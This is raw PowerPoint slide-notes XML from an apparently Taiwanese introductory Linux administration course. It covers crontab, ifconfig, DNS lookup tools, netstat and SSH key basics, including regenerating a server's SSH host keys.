              <a:t>crontab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> –u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>natasha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>  –e //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>新增排程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輸入內容：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>23 14  *   *    *      /bin/echo Hello Linux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                   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>分 時   日 月  週     指令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# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>crontab</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> –u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>natasha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> –l //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>檢查排程列表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# exi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6531311"/>
      </p:ext>
    </p:extLst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十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常用網路指令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6751151"/>
      </p:ext>
    </p:extLst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fconfig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以用來查詢目前我們這個系統的網路卡的狀況的指令，可以查詢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子遮罩網路及網路卡的硬體資訊等等。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fconfig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介面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terfac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網路卡介面代號，包括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th0, eth1, ppp0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等等。</a:t>
            </a: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th0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就是網路卡的代號，也有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o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這個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oopback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HWadd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就是網路卡的硬體位址，俗稱的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C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是也。</a:t>
            </a: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et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add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v4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位址，後續的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cast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sk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別代表的是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roadcast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與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netmask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喔。</a:t>
            </a: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et6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add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是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v6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版本的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TU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網路傳輸的資料量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那一行代表的是網路由啟動到目前為止的封包接收情況，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ackets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封包數、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rrors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封包發生錯誤的數量、 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ropped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封包由於有問題而遭丟棄的數量等等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9234109"/>
      </p:ext>
    </p:extLst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查看網路組態： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>ifconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>ifconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> -a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>變更網卡</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>IP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ifconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> eth0 192.168.11.36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netmask</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> 255.255.225.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>重新啟動網卡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init.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>/network(networking) restart/start/stop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90579783"/>
      </p:ext>
    </p:extLst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修改主機名稱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主機名稱，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>hostname </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>對應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的記錄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</a:t>
            </a:r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檔</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>最早的對應檔</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean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113464"/>
      </p:ext>
    </p:extLst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測試主機名稱指令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hostname</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>ping [DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 名稱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#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>確認結果已經成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修改過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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>裡面的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>HOSTNAME </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>後， 務必要重新開機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109019"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:notes>
</file>

<file path=ppt/notesSlides/notesSlide2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查看某個主機的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>IP:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>host www.googl.eom.tw</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>nslookup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> www.googl.eom.tw</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>手動指令設定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-scripts/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>ifcfg-ethx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ifup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> eth0 {interface}</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>ifdown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> eth0{interface}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>修改網卡組態資料：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r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-scripts/ifcfg-eth0</a:t>
            </a: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525857"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:notes>
</file>

<file path=ppt/notesSlides/notesSlide2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DNS client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>端的設定</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/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檔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最早</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>hostname </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>對應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的記錄檔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修改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>: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ISP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DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>伺服器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記錄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endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/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nsswitch.conf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選擇使用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 或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r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>作為參照組態檔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501503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二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lang="en-US" altLang="zh-TW" b="1" kern="0" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="標楷體" pitchFamily="65" charset="-120"/>
              </a:rPr>
              <a:t>Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" kern="0" dirty="0" smtClean="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="標楷體" pitchFamily="65" charset="-120"/>
              </a:rPr>
              <a:t>系統介紹及使用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部分</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" b="1" kern="0" dirty="0" smtClean="0">
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:ea typeface="標楷體" pitchFamily="65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07418442"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:notes>
</file>

<file path=ppt/notesSlides/notesSlide2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測試</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>DNS client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>端的設定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# dig [options] FQDN [@server]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>選項與參數：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>@server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：如果不以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r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的設定來作為 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>DNS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>查詢，可在此填入其他的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>IP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>options</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：相關的參數很多，主要有 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>+trace, -t type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>以及 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>-x </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>三者最常用</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>+trace </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：就是從 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>.(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>根</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>DNS) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>開始追蹤</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>-t type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：查詢的資料主要有 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>mx, ns, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>soa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>等類型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x     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>  ：查詢反解資訊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621874"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:notes>
</file>

<file path=ppt/notesSlides/notesSlide2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9957402"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:notes>
</file>

<file path=ppt/notesSlides/notesSlide2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1515558"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:notes>
</file>

<file path=ppt/notesSlides/notesSlide2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設定主機名稱</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>: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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>列出目前所有網路連線狀態，使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>IP,Port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an</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>列出目前已經啟動的網路服務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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>tulnp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7060486"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:notes>
</file>

<file path=ppt/notesSlides/notesSlide2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設定主機名稱</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>: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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>列出目前所有網路連線狀態，使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>IP,Port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an</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>列出目前已經啟動的網路服務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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>tulnp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87376436"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:notes>
</file>

<file path=ppt/notesSlides/notesSlide2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設定主機名稱</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>: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</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>列出目前所有網路連線狀態，使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>IP,Port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an</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>列出目前已經啟動的網路服務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/>
              <a:t>netstat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>  –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>tulnp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525857"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:notes>
</file>

<file path=ppt/notesSlides/notesSlide2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修改網卡組態資料</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p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smtClean="0"/>
              <a:t>/network-scripts/ifcfg-eth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1719837"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:notes>
</file>

<file path=ppt/notesSlides/notesSlide2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修改網卡組態資料</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p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smtClean="0"/>
              <a:t>/network-scripts/ifcfg-eth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4585665"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:notes>
</file>

<file path=ppt/notesSlides/notesSlide2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Ifconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> -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ysconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>/network-scripts/ifcfg-eth0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init.d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>/network restar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endParaRPr lang="en-US" altLang="zh-TW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dig </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1200" dirty="0" smtClean="0"/>
              <a:t>jtalearn.mil.tw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netstat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> –an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err="1" smtClean="0"/>
              <a:t>netstat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>  –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>tulnp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> | grep 21</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>搭配可以看有沒有使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>port 21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2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7991252"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:notes>
</file>

<file path=ppt/notesSlides/notesSlide2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(Secure </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>SHell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> protocol) (Port:22)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>使用非對稱式金鑰系統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公鑰與私鑰 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(Public and Private Key) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>公鑰 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(public key)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：提供給遠端主機進行資料加密的行為。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>大家都能取得你的公鑰來將資料加密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私鑰 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(private key)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>：遠端主機使用你的公鑰加密的資料，在本地端就能夠使用私鑰來進行解密。由於私鑰很重要，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>因此私鑰是不外流！只能在自己主機上。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/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60344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的優缺點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穩定的系統</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>具</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>特性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免費或少許費用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>-GNU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>與</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>FSF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>發展</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>GPL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>宣言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安全性、漏洞快速修補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opensource</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>維護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多工、多使用者</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>允許多人同時使用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使用者與群組規劃</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>區分</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>種屬性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整合度佳且多樣的圖形介面</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>(GUI)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沒有特定支援廠商</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW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TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>專業軟體支援度不足與入門門檻高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9987590"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:notes>
</file>

<file path=ppt/notesSlides/notesSlide2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71815"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:notes>
</file>

<file path=ppt/notesSlides/notesSlide2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="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>產生新的伺服器端的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>公鑰與伺服器自己使用的成對私鑰</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p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[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root@www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~]# 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rm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etc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ssh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ssh_host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* &lt;==</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" sz="1400" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="細明體"/>
              </a:rPr>
              <a:t>刪除金鑰檔 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400" b="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="細明體"/>
            </a:endParaRPr>
          </a:p>
          <a:p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[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root@www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~]# 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etc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init.d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sshd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restart </a:t>
            </a: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[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root@www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~]# date; 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ll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 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etc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ssh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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="細明體"/>
              </a:rPr>
              <a:t>ssh_host</a:t>
            </a:r>
            <a:r>
